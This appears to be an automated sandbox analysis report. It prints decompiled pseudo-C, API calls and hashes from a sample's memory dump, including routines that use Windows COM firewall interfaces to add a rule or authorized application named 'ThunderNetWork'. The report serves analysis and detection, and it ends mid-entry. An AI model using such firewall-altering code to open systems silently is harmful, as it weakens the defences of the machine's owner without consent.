                                                                                                                                                      0x0099324f
                                                                                                                                                      0x00993257
                                                                                                                                                      0x0099325a
                                                                                                                                                      0x0099325f
                                                                                                                                                      0x00993260
                                                                                                                                                      0x00993263
                                                                                                                                                      0x00993266
                                                                                                                                                      0x00993270
                                                                                                                                                      0x00993275
                                                                                                                                                      0x0099327d
                                                                                                                                                      0x00993285
                                                                                                                                                      0x00993295
                                                                                                                                                      0x00993295
                                                                                                                                                      0x0099329b
                                                                                                                                                      0x0099329e
                                                                                                                                                      0x009932a5
                                                                                                                                                      0x009932ac
                                                                                                                                                      0x009932b5
                                                                                                                                                      0x009932bb
                                                                                                                                                      0x009932c2
                                                                                                                                                      0x009932c8
                                                                                                                                                      0x009932cf
                                                                                                                                                      0x009932d6
                                                                                                                                                      0x009932dc
                                                                                                                                                      0x009932df
                                                                                                                                                      0x009932e2
                                                                                                                                                      0x009932e7
                                                                                                                                                      0x009932e9
                                                                                                                                                      0x009932ee
                                                                                                                                                      0x009932ee
                                                                                                                                                      0x009932f4
                                                                                                                                                      0x009932fa
                                                                                                                                                      0x0099330b

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0099DD18,0000000C,00993378,00000000,00000000,?,00000000,?,009990BC,00000000,00010000,00030000,?,009984B4), ref: 0099324F
                                                                                                                                                      • __crt_waiting_on_module_handle.LIBCMT ref: 0099325A
                                                                                                                                                        • Part of subcall function 00992003: Sleep.KERNEL32(000003E8,00000000,?,009931A0,KERNEL32.DLL,?,009931EC,?,00000000,?,009990BC,00000000,00010000,00030000,?,009984B4), ref: 0099200F
                                                                                                                                                        • Part of subcall function 00992003: GetModuleHandleW.KERNEL32(00000000,?,009931A0,KERNEL32.DLL,?,009931EC,?,00000000,?,009990BC,00000000,00010000,00030000,?,009984B4), ref: 00992018
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00993283
                                                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00993293
                                                                                                                                                      • __lock.LIBCMT ref: 009932B5
                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 009932C2
                                                                                                                                                      • __lock.LIBCMT ref: 009932D6
                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 009932F4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                      • API String ID: 1028249917-2843748187
                                                                                                                                                      • Opcode ID: 77637e0f1594a0681a08654bf475df8728e4b0566cf27fe7608583672c2c16d4
                                                                                                                                                      • Instruction ID: 48f2574e6663b4527eb5da6d47896da4c410a3a33100591b2aa49731aa94d149
                                                                                                                                                      • Opcode Fuzzy Hash: 77637e0f1594a0681a08654bf475df8728e4b0566cf27fe7608583672c2c16d4
                                                                                                                                                      • Instruction Fuzzy Hash: D31190B1904701EADF20AF7DDC06B5EBBE4AF44314F10851AE4A9A22A1CB74AA40DF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00991191, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176commemoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                      			E00991191(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t67;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr _t80;
				intOrPtr* _t83;
				intOrPtr* _t85;
				char* _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				char* _t110;
				void* _t134;
				intOrPtr _t135;
				intOrPtr _t138;

				_t131 = __edx;
				_t134 = __eax;
				_v44 = 0;
				_t110 = 0x80004005;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v24 = E009980F0(__edx, _a4);
				_t67 = E009980F0(__edx, "ThunderNetWork");
				_v36 = _t67;
				_v28 = 0x100;
				__imp__#2(L"LAN");
				_v40 = _t67;
				E009980F0(__edx, _a8);
				_v32 = 0;
				if(E00991071(_t134,  &_v28,  &_v32) == 0) {
					_t135 = _v44;
				} else {
					_t80 = E009980F0(_t131, E00991C70(_t134, ":") + 1);
					_t138 = _t80;
					__imp__CoInitializeEx(0, 2);
					_t135 = _t80;
					if(_t135 == 0x80010106 || _t135 >= 0) {
						_t110 = E00991058( &_v20,  &_v20);
						if(_t110 >= 0) {
							_t83 = _v20;
							_t110 =  *((intOrPtr*)( *_t83 + 0x48))(_t83,  &_v16);
							if(_t110 >= 0) {
								_t85 = _v20;
								_t110 =  *((intOrPtr*)( *_t85 + 0x1c))(_t85,  &_v12);
								if(_t110 >= 0) {
									if((_v12 & 0x00000004) != 0 && _v12 != 4) {
										_v12 = _v12 ^ 0x00000004;
									}
									_t87 =  &_v8;
									__imp__CoCreateInstance(0x99db2c, 0, 1, 0x99db3c, _t87);
									_t110 = _t87;
									if(_t110 >= 0) {
										_t88 = _v16;
										 *((intOrPtr*)( *_t88 + 0x24))(_t88, _v24);
										_t90 = _v8;
										 *((intOrPtr*)( *_t90 + 0x20))(_t90, _v24);
										_t92 = _v8;
										 *((intOrPtr*)( *_t92 + 0x28))(_t92, _v36);
										_t94 = _v8;
										 *((intOrPtr*)( *_t94 + 0x40))(_t94, _v28);
										_t96 = _v8;
										 *((intOrPtr*)( *_t96 + 0x98))(_t96, _v12);
										_t98 = _v8;
										 *((intOrPtr*)( *_t98 + 0xa8))(_t98, 1);
										_t100 = _v8;
										 *((intOrPtr*)( *_t100 + 0x88))(_t100, 0xffffffff);
										_t102 = _v8;
										 *((intOrPtr*)( *_t102 + 0x80))(_t102, _v40);
										_t104 = _v8;
										 *((intOrPtr*)( *_t104 + 0x48))(_t104, _t138);
										_t106 = _v8;
										 *((intOrPtr*)( *_t106 + 0x98))(_t106, 6);
										_t108 = _v16;
										_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v8);
									}
								}
							}
						}
					}
				}
				_t71 = _v8;
				if(_t71 != 0) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				_t72 = _v16;
				if(_t72 != 0) {
					 *((intOrPtr*)( *_t72 + 8))(_t72);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					 *((intOrPtr*)( *_t73 + 8))(_t73);
				}
				if(_t135 >= 0) {
					__imp__CoUninitialize();
				}
				return _t110;
			}






































                                                                                                                                                      0x00991191
                                                                                                                                                      0x0099119f
                                                                                                                                                      0x009911a1
                                                                                                                                                      0x009911a4
                                                                                                                                                      0x009911a9
                                                                                                                                                      0x009911ac
                                                                                                                                                      0x009911af
                                                                                                                                                      0x009911b2
                                                                                                                                                      0x009911bf
                                                                                                                                                      0x009911c2
                                                                                                                                                      0x009911cc
                                                                                                                                                      0x009911cf
                                                                                                                                                      0x009911d6
                                                                                                                                                      0x009911df
                                                                                                                                                      0x009911e2
                                                                                                                                                      0x009911ea
                                                                                                                                                      0x009911f9
                                                                                                                                                      0x00991337
                                                                                                                                                      0x009911ff
                                                                                                                                                      0x0099120e
                                                                                                                                                      0x00991217
                                                                                                                                                      0x00991219
                                                                                                                                                      0x0099121f
                                                                                                                                                      0x00991227
                                                                                                                                                      0x0099123a
                                                                                                                                                      0x0099123f
                                                                                                                                                      0x00991245
                                                                                                                                                      0x00991252
                                                                                                                                                      0x00991256
                                                                                                                                                      0x0099125c
                                                                                                                                                      0x00991269
                                                                                                                                                      0x0099126d
                                                                                                                                                      0x00991277
                                                                                                                                                      0x0099127f
                                                                                                                                                      0x0099127f
                                                                                                                                                      0x00991283
                                                                                                                                                      0x00991295
                                                                                                                                                      0x0099129b
                                                                                                                                                      0x0099129f
                                                                                                                                                      0x009912a5
                                                                                                                                                      0x009912ae
                                                                                                                                                      0x009912b1
                                                                                                                                                      0x009912ba
                                                                                                                                                      0x009912bd
                                                                                                                                                      0x009912c6
                                                                                                                                                      0x009912c9
                                                                                                                                                      0x009912d2
                                                                                                                                                      0x009912d5
                                                                                                                                                      0x009912de
                                                                                                                                                      0x009912e4
                                                                                                                                                      0x009912ec
                                                                                                                                                      0x009912f2
                                                                                                                                                      0x009912fa
                                                                                                                                                      0x00991300
                                                                                                                                                      0x00991309
                                                                                                                                                      0x0099130f
                                                                                                                                                      0x00991316
                                                                                                                                                      0x00991319
                                                                                                                                                      0x00991321
                                                                                                                                                      0x00991327
                                                                                                                                                      0x00991333
                                                                                                                                                      0x00991333
                                                                                                                                                      0x0099129f
                                                                                                                                                      0x0099126d
                                                                                                                                                      0x00991256
                                                                                                                                                      0x0099123f
                                                                                                                                                      0x00991227
                                                                                                                                                      0x0099133a
                                                                                                                                                      0x0099133f
                                                                                                                                                      0x00991344
                                                                                                                                                      0x00991344
                                                                                                                                                      0x00991347
                                                                                                                                                      0x0099134c
                                                                                                                                                      0x00991351
                                                                                                                                                      0x00991351
                                                                                                                                                      0x00991354
                                                                                                                                                      0x00991359
                                                                                                                                                      0x0099135e
                                                                                                                                                      0x0099135e
                                                                                                                                                      0x00991363
                                                                                                                                                      0x00991365
                                                                                                                                                      0x00991365
                                                                                                                                                      0x00991371

                                                                                                                                                      APIs
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009911B5
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009911C2
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • SysAllocString.OLEAUT32(LAN), ref: 009911D6
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009911E2
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                        • Part of subcall function 00991071: __wcstoui64.LIBCMT ref: 009910DB
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099120E
                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,00000001,?), ref: 00991219
                                                                                                                                                      • CoCreateInstance.OLE32(0099DB2C,00000000,00000001,0099DB3C,?), ref: 00991295
                                                                                                                                                      • CoUninitialize.OLE32(?), ref: 00991365
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$AllocByteCharErrorLastMultiWide$CreateInitializeInstanceUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                      • String ID: LAN$ThunderNetWork
                                                                                                                                                      • API String ID: 1199507461-1899760959
                                                                                                                                                      • Opcode ID: 89262e65c9338fcddf6d6331128d98bf15cf0dce747a5ebff1c43a8c032939b9
                                                                                                                                                      • Instruction ID: 781d49529a3e12c0cfbf7debf4d32bd3ea0d432734b6d1d3ee9973d0d9674461
                                                                                                                                                      • Opcode Fuzzy Hash: 89262e65c9338fcddf6d6331128d98bf15cf0dce747a5ebff1c43a8c032939b9
                                                                                                                                                      • Instruction Fuzzy Hash: 02610F75A00206EFCF00DFE8C889A9E7BB9FF89714F104499F905EB251DB759942CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00991567, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                      			E00991567(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t38;
				char* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char* _t51;
				intOrPtr* _t52;
				char* _t53;
				intOrPtr* _t54;
				char* _t55;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				intOrPtr* _t75;
				signed int _t78;

				_t74 = __edx;
				_t34 =  *0x99f008; // 0x315d8c09
				_v12 = _t34 ^ _t78;
				_v48 = _a4;
				__imp__CoInitialize(0);
				_v44 = 0;
				_v36 = 0;
				_v40 = 0;
				_v32 = 0;
				_t38 = E009980F0(__edx, "HNetCfg.FwMgr");
				_t75 = __imp__CLSIDFromProgID;
				_t39 =  *_t75(_t38,  &_v28);
				_t76 = _t39;
				if(_t39 == 0) {
					_t51 =  &_v28;
					__imp__CoCreateInstance(_t51, 0, 5, 0x99c17c,  &_v44);
					_t76 = _t51;
					if(_t51 >= 0) {
						_t52 = _v44;
						_t74 =  &_v36;
						_t53 =  *((intOrPtr*)( *_t52 + 0x1c))(_t52,  &_v36);
						_t76 = _t53;
						if(_t53 >= 0) {
							_t54 = _v36;
							_t74 =  &_v40;
							_t55 =  *((intOrPtr*)( *_t54 + 0x1c))(_t54,  &_v40);
							_t76 = _t55;
							if(_t55 >= 0) {
								_t58 =  *_t75(E009980F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t76 = _t58;
								if(_t58 >= 0) {
									_t59 = _v40;
									_t74 =  &_v32;
									_t60 =  *((intOrPtr*)( *_t59 + 0x50))(_t59,  &_v32);
									_t76 = _t60;
									if(_t60 >= 0) {
										_t76 =  *((intOrPtr*)( *_v32 + 0x24))(_v32, E009980F0( &_v32, _v48));
									}
								}
							}
						}
					}
				}
				_t40 = _v32;
				if(_t40 != 0) {
					 *((intOrPtr*)( *_t40 + 8))(_t40);
				}
				_t41 = _v40;
				if(_t41 != 0) {
					 *((intOrPtr*)( *_t41 + 8))(_t41);
				}
				_t42 = _v36;
				if(_t42 != 0) {
					 *((intOrPtr*)( *_t42 + 8))(_t42);
				}
				_t43 = _v44;
				if(_t43 != 0) {
					 *((intOrPtr*)( *_t43 + 8))(_t43);
				}
				__imp__CoUninitialize();
				return E00991C57(_t76, 0, _v12 ^ _t78, _t74, _t75, _t76);
			}






























                                                                                                                                                      0x00991567
                                                                                                                                                      0x0099156d
                                                                                                                                                      0x00991574
                                                                                                                                                      0x00991580
                                                                                                                                                      0x00991583
                                                                                                                                                      0x00991592
                                                                                                                                                      0x00991595
                                                                                                                                                      0x00991598
                                                                                                                                                      0x0099159b
                                                                                                                                                      0x0099159e
                                                                                                                                                      0x009915a3
                                                                                                                                                      0x009915aa
                                                                                                                                                      0x009915ac
                                                                                                                                                      0x009915b0
                                                                                                                                                      0x009915c2
                                                                                                                                                      0x009915c6
                                                                                                                                                      0x009915cc
                                                                                                                                                      0x009915d0
                                                                                                                                                      0x009915d2
                                                                                                                                                      0x009915d7
                                                                                                                                                      0x009915dc
                                                                                                                                                      0x009915df
                                                                                                                                                      0x009915e3
                                                                                                                                                      0x009915e5
                                                                                                                                                      0x009915ea
                                                                                                                                                      0x009915ef
                                                                                                                                                      0x009915f2
                                                                                                                                                      0x009915f6
                                                                                                                                                      0x00991607
                                                                                                                                                      0x00991609
                                                                                                                                                      0x0099160d
                                                                                                                                                      0x0099160f
                                                                                                                                                      0x00991614
                                                                                                                                                      0x00991619
                                                                                                                                                      0x0099161c
                                                                                                                                                      0x00991620
                                                                                                                                                      0x00991636
                                                                                                                                                      0x00991636
                                                                                                                                                      0x00991620
                                                                                                                                                      0x0099160d
                                                                                                                                                      0x009915f6
                                                                                                                                                      0x009915e3
                                                                                                                                                      0x009915d0
                                                                                                                                                      0x00991638
                                                                                                                                                      0x0099163d
                                                                                                                                                      0x00991642
                                                                                                                                                      0x00991642
                                                                                                                                                      0x00991645
                                                                                                                                                      0x0099164a
                                                                                                                                                      0x0099164f
                                                                                                                                                      0x0099164f
                                                                                                                                                      0x00991652
                                                                                                                                                      0x00991657
                                                                                                                                                      0x0099165c
                                                                                                                                                      0x0099165c
                                                                                                                                                      0x0099165f
                                                                                                                                                      0x00991664
                                                                                                                                                      0x00991669
                                                                                                                                                      0x00991669
                                                                                                                                                      0x0099166c
                                                                                                                                                      0x00991682

                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00991583
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099159E
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009915AA
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 009915C6
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991601
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00991607
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099162A
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                      • CoUninitialize.OLE32 ref: 0099166C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$ByteCharErrorFromLastMultiProgWide$AllocCreateInitializeInstanceUninitialize_malloclstrlen
                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                      • API String ID: 4188526640-1951265404
                                                                                                                                                      • Opcode ID: 503f9830d501c1a072032a7da8e2372e9aa0712e5ed63d06f12a4027018e4f49
                                                                                                                                                      • Instruction ID: 67fb1631cf7202bf7633ebf8fd13049f2bc8b49d219ce5ab546055eff32453ae
                                                                                                                                                      • Opcode Fuzzy Hash: 503f9830d501c1a072032a7da8e2372e9aa0712e5ed63d06f12a4027018e4f49
                                                                                                                                                      • Instruction Fuzzy Hash: BA410CB1D0021A9FCF10EFA8C8889EEB7BDBF89314B584569E901F7251DB359C46CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00991683, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                                      			E00991683(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				void* _t43;
				char* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				char* _t56;
				intOrPtr* _t57;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				char* _t63;
				intOrPtr* _t64;
				char* _t65;
				intOrPtr* _t68;
				char _t83;
				signed int _t86;

				_t82 = __edx;
				_t39 =  *0x99f008; // 0x315d8c09
				_v12 = _t39 ^ _t86;
				_t83 = 0;
				_v56 = _a4;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t43 = E009980F0(__edx, "HNetCfg.FwMgr");
				_t85 = __imp__CLSIDFromProgID;
				_t44 =  *_t85(_t43,  &_v28);
				_t70 = _t44;
				if(_t44 == 0) {
					_t56 =  &_v28;
					__imp__CoCreateInstance(_t56, 0, 5, 0x99c17c,  &_v32);
					_t70 = _t56;
					if(_t56 >= 0) {
						_t57 = _v32;
						_t82 =  &_v44;
						_t58 =  *((intOrPtr*)( *_t57 + 0x1c))(_t57,  &_v44);
						_t70 = _t58;
						if(_t58 >= 0) {
							_t59 = _v44;
							_t82 =  &_v40;
							_t60 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  &_v40);
							_t70 = _t60;
							if(_t60 >= 0) {
								_t63 =  *_t85(E009980F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t70 = _t63;
								if(_t63 >= 0) {
									_t64 = _v40;
									_t82 =  &_v36;
									_t65 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v36);
									_t70 = _t65;
									if(_t65 >= 0) {
										_v52 = 0;
										_t85 =  &_v48;
										_v48 = 0x100;
										if(E00991071(_v56,  &_v48,  &_v52) != 0) {
											_t68 = _v36;
											_t70 =  *((intOrPtr*)( *_t68 + 0x24))(_t68, _v52, _v48);
										}
										_t83 = 0;
									}
								}
							}
						}
					}
				}
				_t45 = _v36;
				if(_t45 != _t83) {
					 *((intOrPtr*)( *_t45 + 8))(_t45);
				}
				_t46 = _v40;
				if(_t46 != _t83) {
					 *((intOrPtr*)( *_t46 + 8))(_t46);
				}
				_t47 = _v44;
				if(_t47 != _t83) {
					 *((intOrPtr*)( *_t47 + 8))(_t47);
				}
				_t48 = _v32;
				if(_t48 != _t83) {
					 *((intOrPtr*)( *_t48 + 8))(_t48);
				}
				__imp__CoUninitialize();
				return E00991C57(_t70, _t70, _v12 ^ _t86, _t82, _t83, _t85);
			}

































                                                                                                                                                      0x00991683
                                                                                                                                                      0x00991689
                                                                                                                                                      0x00991690
                                                                                                                                                      0x00991699
                                                                                                                                                      0x0099169c
                                                                                                                                                      0x0099169f
                                                                                                                                                      0x009916ae
                                                                                                                                                      0x009916b1
                                                                                                                                                      0x009916b4
                                                                                                                                                      0x009916b7
                                                                                                                                                      0x009916ba
                                                                                                                                                      0x009916bf
                                                                                                                                                      0x009916c6
                                                                                                                                                      0x009916c8
                                                                                                                                                      0x009916cc
                                                                                                                                                      0x009916de
                                                                                                                                                      0x009916e2
                                                                                                                                                      0x009916e8
                                                                                                                                                      0x009916ec
                                                                                                                                                      0x009916f2
                                                                                                                                                      0x009916f7
                                                                                                                                                      0x009916fc
                                                                                                                                                      0x009916ff
                                                                                                                                                      0x00991703
                                                                                                                                                      0x00991705
                                                                                                                                                      0x0099170a
                                                                                                                                                      0x0099170f
                                                                                                                                                      0x00991712
                                                                                                                                                      0x00991716
                                                                                                                                                      0x00991727
                                                                                                                                                      0x00991729
                                                                                                                                                      0x0099172d
                                                                                                                                                      0x0099172f
                                                                                                                                                      0x00991734
                                                                                                                                                      0x00991739
                                                                                                                                                      0x0099173c
                                                                                                                                                      0x00991740
                                                                                                                                                      0x00991745
                                                                                                                                                      0x0099174c
                                                                                                                                                      0x0099174f
                                                                                                                                                      0x0099175e
                                                                                                                                                      0x00991763
                                                                                                                                                      0x0099176f
                                                                                                                                                      0x0099176f
                                                                                                                                                      0x00991771
                                                                                                                                                      0x00991771
                                                                                                                                                      0x00991740
                                                                                                                                                      0x0099172d
                                                                                                                                                      0x00991716
                                                                                                                                                      0x00991703
                                                                                                                                                      0x009916ec
                                                                                                                                                      0x00991773
                                                                                                                                                      0x00991778
                                                                                                                                                      0x0099177d
                                                                                                                                                      0x0099177d
                                                                                                                                                      0x00991780
                                                                                                                                                      0x00991785
                                                                                                                                                      0x0099178a
                                                                                                                                                      0x0099178a
                                                                                                                                                      0x0099178d
                                                                                                                                                      0x00991792
                                                                                                                                                      0x00991797
                                                                                                                                                      0x00991797
                                                                                                                                                      0x0099179a
                                                                                                                                                      0x0099179f
                                                                                                                                                      0x009917a4
                                                                                                                                                      0x009917a4
                                                                                                                                                      0x009917a7
                                                                                                                                                      0x009917bd

                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0099169F
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009916BA
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009916C6
                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,0099C17C,?), ref: 009916E2
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991721
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00991727
                                                                                                                                                        • Part of subcall function 00991071: __wcstoui64.LIBCMT ref: 009910DB
                                                                                                                                                      • CoUninitialize.OLE32 ref: 009917A7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$ByteCharConvertErrorFromLastMultiProgWide_com_util::$AllocCreateInitializeInstanceUninitialize__wcstoui64lstrlen
                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                      • API String ID: 1827900861-1951265404
                                                                                                                                                      • Opcode ID: dda3d07b3f5b474a96c4fb7f5ec72ff845160fa6cf747c01c2d9405dde306d36
                                                                                                                                                      • Instruction ID: 9f3420907fe998a109bb82cf2b9681e741b59f0de09a66414d68c619cfc26b4c
